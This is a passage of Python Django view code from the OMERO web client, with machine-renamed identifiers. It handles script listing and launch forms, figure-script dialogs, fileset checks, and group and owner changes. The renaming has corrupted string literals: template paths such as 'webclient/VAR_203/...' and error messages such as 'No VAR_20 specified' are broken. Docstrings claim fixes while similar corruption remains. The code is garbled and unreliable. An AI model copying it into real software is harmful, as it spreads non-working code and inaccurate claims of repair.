        "inprogress": VAR_195,
        "new_results": len(VAR_197),
        "new_errors": VAR_200,
        "failure": VAR_196,
    }
    VAR_53["template"] = "webclient/FUNC_63/activitiesContent.html"
    return VAR_53
@login_required()
def FUNC_64(VAR_2, VAR_27, **VAR_7):
    """Maintain the session "callback" job registry.

    VAR_27 == "clean" removes either the single POSTed "jobKey" (returning
    a JSON {"removed": bool}) or, without a key, every job that is no
    longer "in progress".
    """
    VAR_2.session.modified = True
    if VAR_27 == "clean":
        if "jobKey" in VAR_2.POST:
            job_key = VAR_2.POST.get("jobKey")
            removed = job_key in VAR_2.session["callback"]
            if removed:
                del VAR_2.session["callback"][job_key]
                VAR_2.session.modified = True
            return JsonResponse({"removed": removed})
        else:
            # Drop every finished/failed job; iterate a snapshot while
            # deleting from the live dict.
            for job_key, job in list(VAR_2.session["callback"].items()):
                if job["status"] != "in progress":
                    del VAR_2.session["callback"][job_key]
    return HttpResponse("OK")
@login_required()
def FUNC_65(VAR_2, VAR_40=None, VAR_6=None, **VAR_7):
    """Serve the experimenter's profile photo as a JPEG HTTP response."""
    photo_bytes = VAR_6.getExperimenterPhoto(VAR_40)
    return HttpResponse(photo_bytes, content_type="image/jpeg")
@login_required()
def FUNC_66(VAR_2, VAR_41, VAR_25=None, **VAR_7):
    """Delegate to webgateway's full image viewer.

    Points the viewer at this server's webindex URL (optionally suffixed
    with VAR_25), with any trailing slash removed.
    """
    server_url = VAR_352("webindex")
    if VAR_25 is not None:
        server_url = server_url + VAR_25
    VAR_7["viewport_server"] = server_url.rstrip("/")
    return webgateway_views.full_viewer(VAR_2, VAR_41, **VAR_7)
@login_required()
@render_response()
def FUNC_67(VAR_2, VAR_6=None, **VAR_7):
    """Build a nested tree of available server scripts for the UI.

    Scripts whose full path appears in the 'scripts_to_ignore' server
    setting are skipped. Returns a sorted list of {'name', 'id'} leaves and
    {'name', 'ul': [...]} folders; if there is a single top-level folder
    (and ?full_path is not set) its children are returned directly.

    Fixes: the tree-walk referenced an undefined name (now the local `ul`),
    the final unwrap referenced `scriptList` (now `VAR_207`), and
    list.sort was called with an invalid keyword (now `key=`).
    """
    VAR_202 = VAR_6.getScriptService()
    VAR_203 = VAR_202.getScripts()
    VAR_204 = {}
    VAR_205 = (
        VAR_2.session.get("server_settings", {})
        .get("scripts_to_ignore", "")
        .split(",")
    )
    for s in VAR_203:
        VAR_42 = s.id.val
        VAR_316 = s.path.val
        VAR_3 = s.name.val
        VAR_317 = os.path.join(VAR_316, VAR_3)
        if VAR_317 in VAR_205:
            VAR_0.info("Ignoring script %r" % VAR_317)
            continue
        # Walk/create the nested-dict path for this script; the leaf maps
        # the script's file name to its id.
        ul = VAR_204
        VAR_318 = VAR_317.split(os.path.sep)
        for li, VAR_364 in enumerate(VAR_318):
            if len(VAR_364) == 0:
                continue
            if VAR_364 not in ul:
                if li + 1 == len(VAR_318):
                    ul[VAR_364] = VAR_42
                else:
                    ul[VAR_364] = {}
            ul = ul[VAR_364]

    def FUNC_85(VAR_206):
        # Convert nested dicts into sorted lists of tree nodes.
        VAR_319 = []
        for VAR_3, VAR_375 in VAR_206.items():
            if isinstance(VAR_375, dict):
                VAR_319.append({"name": VAR_3, "ul": FUNC_85(VAR_375)})
            else:
                VAR_319.append({"name": VAR_3, "id": VAR_375})
        VAR_319.sort(key=lambda x: x["name"].lower())
        return VAR_319

    VAR_207 = FUNC_85(VAR_204)
    if not VAR_2.GET.get("full_path") and len(VAR_207) == 1:
        VAR_207 = VAR_207[0]["ul"]
    return VAR_207
@login_required()
@render_response()
def FUNC_68(VAR_2, VAR_42, VAR_6=None, **VAR_7):
    """Return the UI description (inputs, defaults, groupings) for a script.

    Builds 'paramData' from the script's params, pre-filling defaults from
    the query string, and nests inputs whose 'grouping' (e.g. '03.1') makes
    them children of another input ('03').

    Fix: list.sort was called with an invalid keyword; now `key=`.
    """
    VAR_202 = VAR_6.getScriptService()
    try:
        VAR_73 = VAR_202.getParams(VAR_241(VAR_42))
    except Exception as ex:
        if ex.message.lower().startswith("no processor available"):
            return {
                "template": "webclient/VAR_203/no_processor.html",
                "scriptId": VAR_42,
            }
        raise ex
    if VAR_73 is None:
        return HttpResponse()
    VAR_208 = {}
    VAR_208["id"] = VAR_241(VAR_42)
    VAR_208["name"] = VAR_73.name.replace("_", " ")
    VAR_208["description"] = VAR_73.description
    VAR_208["authors"] = ", ".join([a for a in VAR_73.authors])
    VAR_208["contact"] = VAR_73.contact
    VAR_208["version"] = VAR_73.version
    VAR_208["institutions"] = ", ".join([VAR_320 for VAR_320 in VAR_73.institutions])
    VAR_209 = []  # use a list so we can sort by 'grouping'
    VAR_210 = None
    VAR_211 = None
    for VAR_312, VAR_322 in VAR_73.inputs.items():
        VAR_320 = {}
        VAR_320["name"] = VAR_312.replace("_", " ")
        VAR_320["key"] = VAR_312
        if not VAR_322.optional:
            VAR_320["required"] = True
        VAR_320["description"] = VAR_322.description
        if VAR_322.min:
            VAR_320["min"] = VAR_347(VAR_322.min.getValue())
        if VAR_322.max:
            VAR_320["max"] = VAR_347(VAR_322.max.getValue())
        if VAR_322.values:
            VAR_320["options"] = [VAR_416.getValue() for VAR_416 in VAR_322.values.getValue()]
        if VAR_322.useDefault:
            VAR_320["default"] = unwrap(VAR_322.prototype)
            if isinstance(VAR_320["default"], omero.model.IObject):
                VAR_320["default"] = None
        VAR_321 = unwrap(VAR_322.prototype)
        if VAR_321.__class__.__name__ == "dict":
            VAR_320["map"] = True
        elif VAR_321.__class__.__name__ == "list":
            VAR_320["list"] = True
            if "default" in VAR_320:
                VAR_320["default"] = ",".join([VAR_347(VAR_364) for VAR_364 in VAR_320["default"]])
        elif isinstance(VAR_321, bool):
            VAR_320["boolean"] = True
        elif isinstance(VAR_321, int) or isinstance(VAR_321, VAR_241):
            VAR_320["number"] = "number"
        elif isinstance(VAR_321, float):
            VAR_320["number"] = "float"
        # query-string value overrides any script-declared default
        if VAR_2.GET.get(VAR_312, None) is not None:
            VAR_320["default"] = VAR_2.GET.get(VAR_312, None)
        VAR_320["prototype"] = unwrap(VAR_322.prototype)
        VAR_320["grouping"] = VAR_322.grouping
        VAR_209.append(VAR_320)
        if VAR_312 == "IDs":
            VAR_211 = VAR_320  # remember these...
        if VAR_312 == "Data_Type":
            VAR_210 = VAR_320
    VAR_209.sort(key=lambda VAR_320: VAR_320["grouping"])
    if (
        VAR_210 is not None
        and VAR_211 is not None
        and "options" in VAR_210
    ):
        VAR_211["default"] = ""
        for VAR_215 in VAR_210["options"]:
            if VAR_2.GET.get(VAR_215, None) is not None:
                VAR_210["default"] = VAR_215
                VAR_211["default"] = VAR_2.GET.get(VAR_215, "")
                break  # only use the first match
        # ?Well=... has no direct option: resolve wells to their images
        if len(VAR_211["default"]) == 0 and VAR_2.GET.get("Well", None) is not None:
            if "Image" in VAR_210["options"]:
                VAR_214 = [VAR_241(j) for j in VAR_2.GET.get("Well", None).split(",")]
                VAR_324 = 0
                try:
                    VAR_324 = int(VAR_2.GET.get("Index", 0))
                except Exception:
                    pass
                VAR_113 = VAR_6.getObjects("Well", VAR_214)
                VAR_306 = [VAR_347(w.getImage(VAR_324).getId()) for w in VAR_113]
                VAR_210["default"] = "Image"
                VAR_211["default"] = ",".join(VAR_306)
    # fold inputs grouped like '03.1' into the children of '03'
    for VAR_320 in range(len(VAR_209)):
        if len(VAR_209) <= VAR_320:
            break
        VAR_322 = VAR_209[VAR_320]
        VAR_323 = VAR_322["grouping"]  # E.g 03
        VAR_322["children"] = list()
        while len(VAR_209) > VAR_320 + 1:
            VAR_369 = VAR_209[VAR_320 + 1]["grouping"]  # E.g. 03.1
            if VAR_369.split(".")[0] == VAR_323:
                VAR_322["children"].append(VAR_209[VAR_320 + 1])
                VAR_209.pop(VAR_320 + 1)
            else:
                break
    VAR_208["inputs"] = VAR_209
    return {
        "template": "webclient/VAR_203/FUNC_68.html",
        "paramData": VAR_208,
        "scriptId": VAR_42,
    }
@login_required()
@render_response()
def FUNC_69(VAR_2, VAR_43, VAR_6=None, **VAR_7):
    """Prepare context for one of the figure-script dialogs.

    VAR_43 selects the dialog: 'SplitView', 'Thumbnail' or 'MakeMovie'.
    Input objects come from ?Image=/?Dataset=/?Well= comma-lists; wells are
    resolved to their images first.

    Fixes: the movie-name fallback referenced an undefined name (now
    VAR_414[0]) and list.sort used an invalid keyword (now `key=`).
    """
    VAR_212 = VAR_2.GET.get("Image", None)  # comma - delimited list
    VAR_213 = VAR_2.GET.get("Dataset", None)
    VAR_214 = VAR_2.GET.get("Well", None)
    if VAR_214 is not None:
        VAR_214 = [VAR_241(VAR_320) for VAR_320 in VAR_214.split(",")]
        VAR_113 = VAR_6.getObjects("Well", VAR_214)
        VAR_324 = getIntOrDefault(VAR_2, "Index", 0)
        VAR_212 = [VAR_347(w.getImage(VAR_324).getId()) for w in VAR_113]
        VAR_212 = ",".join(VAR_212)
    if VAR_212 is None and VAR_213 is None:
        return HttpResponse(
            "Need to specify /?Image=1,2 or /?Dataset=1,2 or /?Well=1,2"
        )

    def FUNC_86(VAR_215, VAR_187):
        # Validate a comma-list of ids, returning (found_ids, id->object),
        # and switch the service group to the first object's group.
        VAR_325 = [int(VAR_40) for VAR_40 in VAR_187.split(",")]
        VAR_326 = {}
        for VAR_38 in VAR_6.getObjects(VAR_215, VAR_325):
            VAR_326[VAR_38.id] = VAR_38
        VAR_327 = [VAR_41 for VAR_41 in VAR_325 if VAR_41 in VAR_326.keys()]
        if len(VAR_327) == 0:
            raise Http404("No %ss found with IDs %s" % (VAR_215, VAR_187))
        else:
            VAR_337 = list(VAR_326.values())[0].getDetails().group.id.val
            VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_337)
        return VAR_327, VAR_326

    VAR_53 = {}
    if VAR_212 is not None:
        VAR_212, VAR_328 = FUNC_86("Image", VAR_212)
        VAR_53["idString"] = ",".join([VAR_347(VAR_320) for VAR_320 in VAR_212])
        VAR_53["dtype"] = "Image"
    if VAR_213 is not None:
        VAR_213, VAR_329 = FUNC_86("Dataset", VAR_213)
        VAR_53["idString"] = ",".join([VAR_347(VAR_320) for VAR_320 in VAR_213])
        VAR_53["dtype"] = "Dataset"
    if VAR_43 == "SplitView":
        VAR_330 = "/omero/figure_scripts/Split_View_Figure.py"
        VAR_54 = "webclient/VAR_203/split_view_figure.html"
        VAR_331 = []  # info about each image: name, tags, datasets
        for VAR_432 in VAR_212:
            VAR_158 = {"id": VAR_432}
            VAR_370 = VAR_328[VAR_432]
            VAR_158["name"] = VAR_370.getName()
            VAR_164 = [
                VAR_180.getTextValue()
                for VAR_180 in VAR_370.listAnnotations()
                if VAR_180._obj.__class__ == omero.model.TagAnnotationI
            ]
            VAR_158["tags"] = VAR_164
            VAR_158["datasets"] = [VAR_364.getName() for VAR_364 in VAR_370.listParents()]
            VAR_331.append(VAR_158)
        VAR_142 = VAR_328[VAR_212[0]]
        VAR_53["imgDict"] = VAR_331
        VAR_53["image"] = VAR_142
        VAR_53["channels"] = VAR_142.getChannels()
    elif VAR_43 == "Thumbnail":
        VAR_330 = "/omero/figure_scripts/Thumbnail_Figure.py"
        VAR_54 = "webclient/VAR_203/thumbnail_figure.html"

        def FUNC_89(VAR_212):
            # Collect tag annotations per image in one query.
            VAR_408 = VAR_6.getAnnotationLinks("Image", parent_ids=VAR_212)
            VAR_409 = {}  # image id -> [tags]
            VAR_410 = {}
            for VAR_432 in VAR_212:
                VAR_409[VAR_432] = []
            for VAR_346 in VAR_408:
                VAR_383 = VAR_346.getChild()
                if VAR_383._obj.__class__ == omero.model.TagAnnotationI:
                    VAR_410[VAR_383.id] = VAR_383
                    VAR_409[VAR_346.getParent().id].append(VAR_383)
            VAR_411 = []
            for VAR_432 in VAR_212:
                VAR_411.append({"id": VAR_432, "tags": VAR_409[VAR_432]})
            VAR_164 = []
            for tId, VAR_433 in VAR_410.items():
                VAR_164.append(VAR_433)
            return VAR_411, VAR_164

        VAR_371 = []  # multiple collections of images
        VAR_164 = []
        VAR_372 = "Thumbnail_Figure"
        if VAR_213 is not None:
            for VAR_364 in VAR_6.getObjects("Dataset", VAR_213):
                VAR_306 = [VAR_320.id for VAR_320 in VAR_364.listChildren()]
                VAR_411, VAR_412 = FUNC_89(VAR_306)
                VAR_371.append({"name": VAR_364.getName(), "imageTags": VAR_411})
                VAR_164.extend(VAR_412)
            VAR_372 = VAR_371[0]["name"]
        else:
            VAR_411, VAR_412 = FUNC_89(VAR_212)
            VAR_371.append({"name": "images", "imageTags": VAR_411})
            VAR_164.extend(VAR_412)
            VAR_413 = VAR_6.getObject("Image", VAR_212[0]).getParent()
            VAR_372 = VAR_413.getName() or "Thumbnail Figure"
            VAR_53["parent_id"] = VAR_413.getId()
        VAR_373 = set()  # remove duplicates
        VAR_374 = []
        for VAR_433 in VAR_164:
            if VAR_433.id not in VAR_373:
                VAR_374.append(VAR_433)
                VAR_373.add(VAR_433.id)
        VAR_374.sort(key=lambda x: x.getTextValue().lower())
        VAR_53["thumbSets"] = VAR_371
        VAR_53["tags"] = VAR_374
        VAR_53["figureName"] = VAR_372.replace(" ", "_")
    elif VAR_43 == "MakeMovie":
        VAR_330 = "/omero/export_scripts/Make_Movie.py"
        VAR_54 = "webclient/VAR_203/make_movie.html"
        VAR_142 = VAR_6.getObject("Image", VAR_212[0])
        VAR_414 = VAR_142.getName().rsplit(".", 1)
        # keep extension only if it looks like a real (short) one
        if len(VAR_414) > 1 and len(VAR_414[1]) > 3:
            VAR_414 = ".".join(VAR_414)
        else:
            VAR_414 = VAR_414[0]
        VAR_53["movieName"] = os.path.basename(VAR_414)
        VAR_282 = []
        for VAR_383 in VAR_142.getChannels():
            VAR_282.append(
                {
                    "active": VAR_383.isActive(),
                    "color": VAR_383.getColor().getHtml(),
                    "label": VAR_383.getLabel(),
                }
            )
        VAR_53["channels"] = VAR_282
        VAR_53["sizeT"] = VAR_142.getSizeT()
        VAR_53["sizeZ"] = VAR_142.getSizeZ()
    VAR_202 = VAR_6.getScriptService()
    VAR_42 = VAR_202.getScriptID(VAR_330)
    if VAR_42 < 0:
        raise AttributeError("No script found for VAR_316 '%s'" % VAR_330)
    VAR_53["template"] = VAR_54
    VAR_53["scriptId"] = VAR_42
    return VAR_53
@login_required()
@render_response()
def FUNC_70(VAR_2, VAR_27, VAR_6=None, **VAR_7):
    """Report filesets that would be split by acting on the requested objects.

    Reads ?Image=/?Dataset=/?Project= comma-lists, asks the container
    service which filesets would be split, and renders the confirmation
    dialog context.
    """
    selected = {}
    for dtype in ("Image", "Dataset", "Project"):
        raw_ids = VAR_2.GET.get(dtype, None)
        if raw_ids is not None:
            selected[dtype] = [int(part) for part in raw_ids.split(",")]
    by_fileset = VAR_6.getContainerService().getImagesBySplitFilesets(
        selected, None, VAR_6.SERVICE_OPTS
    )
    split_filesets = [
        {
            "id": fs_id,
            "attempted_iids": flagged[True],
            "blocking_iids": flagged[False],
        }
        for fs_id, flagged in by_fileset.items()
    ]
    context = {"split_filesets": split_filesets}
    context["action"] = "move" if VAR_27 == "chgrp" else VAR_27
    context["template"] = "webclient/FUNC_63/" "fileset_check_dialog_content.html"
    return context
def FUNC_71(
    VAR_6, VAR_44, VAR_45, VAR_46, VAR_47, VAR_48, VAR_11
):
    """Expand selected Project/Dataset/Image/Screen/Plate ids into the full
    set of objects affected by a move, plus containers left childless.

    Returns {'remove': {per-type id lists}, 'childless': {'project': [...],
    'dataset': [...], 'orphaned': bool}}.

    Fixes: the HQL strings were corrupted ('VAR_101 by' -> 'group by',
    ':VAR_153' -> ':iids' to match the parameter map key).
    """
    VAR_73 = omero.sys.ParametersI()
    VAR_74 = VAR_6.getQueryService()
    VAR_44 = set(VAR_44)
    VAR_45 = set(VAR_45)
    VAR_46 = set(VAR_46)
    VAR_219 = set([])
    VAR_48 = set(VAR_48)
    VAR_47 = set(VAR_47)
    # projects -> add their datasets
    if VAR_44:
        VAR_73.map = {}
        VAR_73.map["pids"] = rlist([rlong(x) for x in list(VAR_44)])
        VAR_75 = """
            select pdlink.child.id
            from ProjectDatasetLink pdlink
            where pdlink.parent.id in (:pids)
            """
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
            VAR_45.add(e[0].val)
    # screens -> add their plates
    if VAR_47:
        VAR_73.map = {}
        VAR_73.map["sids"] = rlist([rlong(x) for x in VAR_47])
        VAR_75 = """
            select splink.child.id
            from ScreenPlateLink splink
            where splink.parent.id in (:sids)
            """
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
            VAR_48.add(e[0].val)
    # datasets -> add their images (and note each image's fileset)
    if VAR_45:
        VAR_73.map = {}
        VAR_73.map["dids"] = rlist([rlong(x) for x in VAR_45])
        VAR_75 = """
            select dilink.child.id,
            dilink.child.fileset.id
            from DatasetImageLink dilink
            where dilink.parent.id in (:dids)
            """
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
            VAR_46.add(e[0].val)
            if e[1] is not None:
                VAR_219.add(e[1].val)
    # plates -> add their images
    if VAR_48:
        VAR_73.map = {}
        VAR_73.map["plids"] = rlist([rlong(x) for x in VAR_48])
        VAR_75 = """
            select ws.image.id
            from WellSample ws
            join ws.plateAcquisition pa
            where pa.plate.id in (:plids)
            """
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
            VAR_46.add(e[0].val)
    # multi-image filesets: pull in all sibling images so filesets move whole
    if VAR_219:
        VAR_73.map = {}
        VAR_73.map["fsids"] = rlist([rlong(x) for x in VAR_219])
        VAR_75 = """
            select VAR_142.id
            from Image VAR_142
            left outer join VAR_142.datasetLinks dilink
            where VAR_142.fileset.id in (select VAR_365.id
            from Image im
            join im.fileset VAR_365
            where VAR_365.id in (:fsids)
            group by VAR_365.id
            having count(im.id)>1)
            """
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
            VAR_46.add(e[0].val)
    # datasets that would be left with no images (or images left orphaned)
    VAR_220 = set([])
    VAR_221 = False
    if VAR_46:
        VAR_73.map = {
            "iids": rlist([rlong(x) for x in VAR_46]),
        }
        VAR_332 = ""
        if VAR_45:
            VAR_73.map["dids"] = rlist([rlong(x) for x in VAR_45])
            VAR_332 = """
                and (
                dilink.parent.id not in (:dids)
                or dilink.parent.id = null
                )
                """
        VAR_75 = (
            """
            select distinct dilink.parent.id
            from Image VAR_142
            left outer join VAR_142.datasetLinks dilink
            where VAR_142.id in (:iids)
            %s
            and (select count(dilink2.child.id)
            from DatasetImageLink dilink2
            where dilink2.parent.id = dilink.parent.id
            and dilink2.child.id not in (:iids)) = 0
            """
            % VAR_332
        )
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
            if e:
                VAR_220.add(e[0].val)
            else:
                VAR_221 = True
    # projects that would be left with no datasets
    VAR_222 = set([])
    if VAR_45:
        VAR_73.map = {"dids": rlist([rlong(x) for x in VAR_45])}
        VAR_333 = ""
        if VAR_44:
            VAR_73.map["pids"] = rlist([rlong(x) for x in VAR_44])
            VAR_333 = "and pdlink.parent.id not in (:pids)"
        VAR_75 = (
            """
            select distinct pdlink.parent.id
            from ProjectDatasetLink pdlink
            where pdlink.child.id in (:dids)
            %s
            and (select count(pdlink2.child.id)
            from ProjectDatasetLink pdlink2
            where pdlink2.parent.id = pdlink.parent.id
            and pdlink2.child.id not in (:dids)) = 0
            """
            % VAR_333
        )
        for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
            VAR_222.add(e[0].val)
    VAR_223 = {
        "remove": {
            "project": list(VAR_44),
            "dataset": list(VAR_45),
            "screen": list(VAR_47),
            "plate": list(VAR_48),
            "image": list(VAR_46),
        },
        "childless": {
            "project": list(VAR_222),
            "dataset": list(VAR_220),
            "orphaned": VAR_221,
        },
    }
    return VAR_223
@require_POST
@login_required()
def FUNC_72(VAR_2, VAR_6=None, **VAR_7):
    """Dry-run wrapper for chgrp; delegates to FUNC_73.

    Fix: the connection was previously forwarded as the undefined name
    `conn`, raising NameError; pass the actual VAR_6 parameter.
    """
    return FUNC_73(VAR_2, VAR_27="chgrp", VAR_6=VAR_6, **VAR_7)
@require_POST
@login_required()
def FUNC_73(VAR_2, VAR_27, VAR_6=None, **VAR_7):
    """Submit a chgrp/chown dry-run for the POSTed objects and return the
    job handle as plain text.

    VAR_27 is 'chgrp' (target from 'group_id') or 'chown' (from 'owner_id').
    """
    targets = {}
    for dtype in ["Project", "Dataset", "Image", "Screen", "Plate", "Fileset"]:
        raw_ids = VAR_2.POST.get(dtype, None)
        if raw_ids is not None:
            targets[dtype] = [int(oid) for oid in raw_ids.split(",")]
    if VAR_27 == "chgrp":
        target_id = getIntOrDefault(VAR_2, "group_id", None)
    elif VAR_27 == "chown":
        target_id = getIntOrDefault(VAR_2, "owner_id", None)
    handle = VAR_6.submitDryRun(VAR_27, targets, target_id)
    return HttpResponse(VAR_347(handle))
@login_required()
def FUNC_74(VAR_2, VAR_6=None, **VAR_7):
    """Move the POSTed objects into another group (chgrp), registering one
    session job per object type, and return the resulting tree updates.

    Fixes: JsonResponse was given an invalid keyword (now status=405); the
    regroupFilesets call referenced the undefined name `fsIds` (now the
    local VAR_307); and the Project..Plate id strings were parsed into
    dead variables while the raw strings were passed to FUNC_71 — they are
    now parsed in place so FUNC_71 receives id lists.
    """
    if not VAR_2.method == "POST":
        return JsonResponse({"Error": "Need to POST to chgrp"}, status=405)
    VAR_20 = getIntOrDefault(VAR_2, "group_id", None)
    if VAR_20 is None:
        return JsonResponse({"Error": "chgrp: No VAR_20 specified"})
    VAR_20 = VAR_241(VAR_20)

    def FUNC_87(VAR_71):
        # owner of the first posted Dataset/Image/Plate — moves run as them
        for VAR_433 in ["Dataset", "Image", "Plate"]:
            VAR_187 = VAR_71.POST.get(VAR_433, None)
            if VAR_187 is not None:
                for o in list(VAR_6.getObjects(VAR_433, VAR_187.split(","))):
                    return o.getDetails().owner.id.val

    VAR_101 = VAR_6.getObject("ExperimenterGroup", VAR_20)
    VAR_226 = VAR_2.POST.get("new_container_name", None)
    VAR_227 = VAR_2.POST.get("new_container_type", None)
    VAR_228 = None
    VAR_229 = FUNC_87(VAR_2)
    VAR_6.SERVICE_OPTS.setOmeroUser(VAR_229)
    if (
        VAR_226 is not None
        and len(VAR_226) > 0
        and VAR_227 is not None
    ):
        VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_20)
        VAR_228 = VAR_6.createContainer(VAR_227, VAR_226)
    if VAR_228 is None:
        VAR_334 = VAR_2.POST.get("target_id", None)
        VAR_228 = VAR_334 is not None and VAR_334.split("-")[1] or None
    VAR_225 = ["Project", "Dataset", "Image", "Screen", "Plate"]
    for VAR_215 in VAR_225:
        VAR_154 = VAR_2.POST.get(VAR_215, None)
        if VAR_154 is not None:
            VAR_144 = [int(VAR_40) for VAR_40 in VAR_154.split(",")]
            VAR_307 = VAR_2.POST.getlist("fileset")
            if len(VAR_307) > 0:
                if VAR_215 == "Dataset":
                    VAR_6.regroupFilesets(dsIds=VAR_144, fsIds=VAR_307)
                else:
                    # move whole filesets: include every sibling image
                    for VAR_365 in VAR_6.getObjects("Fileset", VAR_307):
                        VAR_144.extend([VAR_320.id for VAR_320 in VAR_365.copyImages()])
                    VAR_144 = list(set(VAR_144))  # remove duplicates
            VAR_0.debug("chgrp to VAR_101:%s %s-%s" % (VAR_20, VAR_215, VAR_144))
            VAR_84 = VAR_6.chgrpObjects(VAR_215, VAR_144, VAR_20, VAR_228)
            VAR_198 = VAR_347(VAR_84)
            VAR_2.session["callback"][VAR_198] = {
                "job_type": "chgrp",
                "group": VAR_101.getName(),
                "to_group_id": VAR_20,
                "dtype": VAR_215,
                "obj_ids": VAR_144,
                "job_name": "Change group",
                "start_time": datetime.datetime.now(),
                "status": "in progress",
            }
            VAR_2.session.modified = True
    # work out which containers the client tree needs to refresh
    VAR_44 = VAR_2.POST.get("Project", [])
    VAR_45 = VAR_2.POST.get("Dataset", [])
    VAR_46 = VAR_2.POST.get("Image", [])
    VAR_47 = VAR_2.POST.get("Screen", [])
    VAR_48 = VAR_2.POST.get("Plate", [])
    if VAR_44:
        VAR_44 = [VAR_241(x) for x in VAR_44.split(",")]
    if VAR_45:
        VAR_45 = [VAR_241(x) for x in VAR_45.split(",")]
    if VAR_46:
        VAR_46 = [VAR_241(x) for x in VAR_46.split(",")]
    if VAR_47:
        VAR_47 = [VAR_241(x) for x in VAR_47.split(",")]
    if VAR_48:
        VAR_48 = [VAR_241(x) for x in VAR_48.split(",")]
    VAR_230 = FUNC_71(
        VAR_6,
        VAR_44,
        VAR_45,
        VAR_46,
        VAR_47,
        VAR_48,
        VAR_2.session.get("user_id"),
    )
    return JsonResponse({"update": VAR_230})
@login_required()
def FUNC_75(VAR_2, VAR_6=None, **VAR_7):
    """Change owner (chown) of the POSTed objects, registering one session
    job per object type; returns {'jobIds': [...]}.

    Fixes: JsonResponse was given an invalid keyword (now status=405), and
    the 'Experimenter not found' message used '%' with no placeholder,
    which raised TypeError instead of returning the error response.
    """
    if not VAR_2.method == "POST":
        return JsonResponse({"Error": "Need to POST to chown"}, status=405)
    VAR_231 = getIntOrDefault(VAR_2, "owner_id", None)
    if VAR_231 is None:
        return JsonResponse({"Error": "chown: No VAR_231 specified"})
    VAR_231 = int(VAR_231)
    VAR_232 = VAR_6.getObject("Experimenter", VAR_231)
    if VAR_232 is None:
        return JsonResponse({"Error": "chown: Experimenter %s not found" % VAR_231})
    VAR_225 = ["Project", "Dataset", "Image", "Screen", "Plate"]
    VAR_233 = []
    for VAR_215 in VAR_225:
        VAR_154 = VAR_2.POST.get(VAR_215, None)
        if VAR_154 is not None:
            VAR_144 = [int(VAR_40) for VAR_40 in VAR_154.split(",")]
            VAR_0.debug("chown to VAR_103:%s %s-%s" % (VAR_231, VAR_215, VAR_144))
            VAR_84 = VAR_6.chownObjects(VAR_215, VAR_144, VAR_231)
            VAR_198 = VAR_347(VAR_84)
            VAR_233.append(VAR_198)
            VAR_2.session["callback"][VAR_198] = {
                "job_type": "chown",
                "owner": VAR_232.getFullName(),
                "to_owner_id": VAR_231,
                "dtype": VAR_215,
                "obj_ids": VAR_144,
                "job_name": "Change owner",
                "start_time": datetime.datetime.now(),
                "status": "in progress",
            }
            VAR_2.session.modified = True
    return JsonResponse({"jobIds": VAR_233})
@login_required(setGroupContext=True)
def FUNC_76(VAR_2, VAR_42, VAR_6=None, **VAR_7):
    """Collect script inputs from the POST data and launch the script.

    Converts each POSTed value to the rtype declared by the script's
    prototype (bool, map, list, or scalar), attaches any uploaded file as
    a FileAnnotation, sets the service group from the first target object,
    and delegates to FUNC_79.

    Fix: the comma-separated-list branch referenced the undefined name
    `values`; it now splits VAR_417[0].
    """
    VAR_202 = VAR_6.getScriptService()
    VAR_50 = {}
    VAR_49 = VAR_241(VAR_42)
    try:
        VAR_73 = VAR_202.getParams(VAR_49)
    except Exception as x:
        if x.message and x.message.startswith("No processor available"):
            VAR_174 = FUNC_79(VAR_2, VAR_6, VAR_49, VAR_50, VAR_43="Script")
            return JsonResponse(VAR_174)
        else:
            raise
    VAR_73 = VAR_202.getParams(VAR_49)
    VAR_43 = VAR_73.name.replace("_", " ").replace(".py", "")
    VAR_0.debug("Script: run with VAR_2.POST: %s" % VAR_2.POST)
    VAR_234 = (
        "file_annotation" in VAR_2.FILES and VAR_2.FILES["file_annotation"] or None
    )
    VAR_235 = None
    if VAR_234 is not None and VAR_234 != "":
        VAR_104 = BaseContainer(VAR_6)
        VAR_235 = VAR_104.createFileAnnotations(VAR_234, [])
    for VAR_312, VAR_322 in VAR_73.inputs.items():
        VAR_335 = VAR_322.prototype
        VAR_336 = VAR_335.__class__
        # special case: wire the uploaded file annotation straight in
        if VAR_312 == "File_Annotation" and VAR_235 is not None:
            VAR_50[VAR_312] = VAR_336(VAR_347(VAR_235))
            continue
        if VAR_336 == omero.rtypes.RBoolI:
            VAR_375 = VAR_312 in VAR_2.POST
            VAR_50[VAR_312] = VAR_336(VAR_375)
            continue
        if VAR_336.__name__ == "RMapI":
            # maps are POSTed as <key>_key0/<key>_value0, _key1/_value1, ...
            VAR_376 = "%s_key0" % VAR_312
            VAR_377 = "%s_value0" % VAR_312
            VAR_378 = 0
            VAR_379 = {}
            while VAR_376 in VAR_2.POST:
                VAR_415 = VAR_347(VAR_2.POST[VAR_376])
                VAR_416 = VAR_2.POST[VAR_377]
                if len(VAR_415) > 0 and len(VAR_416) > 0:
                    VAR_379[VAR_347(VAR_415)] = VAR_416
                VAR_378 += 1
                VAR_376 = "%s_key%d" % (VAR_312, VAR_378)
                VAR_377 = "%s_value%d" % (VAR_312, VAR_378)
            if len(VAR_379) > 0:
                VAR_50[VAR_312] = wrap(VAR_379)
            continue
        if VAR_312 in VAR_2.POST:
            if VAR_336 == omero.rtypes.RListI:
                VAR_417 = VAR_2.POST.getlist(VAR_312)
                if len(VAR_417) == 0:
                    continue
                if len(VAR_417) == 1:  # process comma-separated list
                    if len(VAR_417[0]) == 0:
                        continue
                    VAR_417 = VAR_417[0].split(",")
                # guess the element rtype from the prototype's first element
                VAR_418 = omero.rtypes.RStringI
                VAR_419 = VAR_335.val  # list
                if len(VAR_419) > 0:
                    VAR_418 = VAR_419[0].__class__
                    if VAR_418 == int(1).__class__:
                        VAR_418 = omero.rtypes.rint
                    if VAR_418 == VAR_241(1).__class__:
                        VAR_418 = omero.rtypes.rlong
                VAR_420 = []
                for VAR_416 in VAR_417:
                    try:
                        VAR_38 = VAR_418(VAR_416.strip())
                    except Exception:
                        VAR_0.debug("Invalid entry for '%s' : %s" % (VAR_312, VAR_416))
                        continue
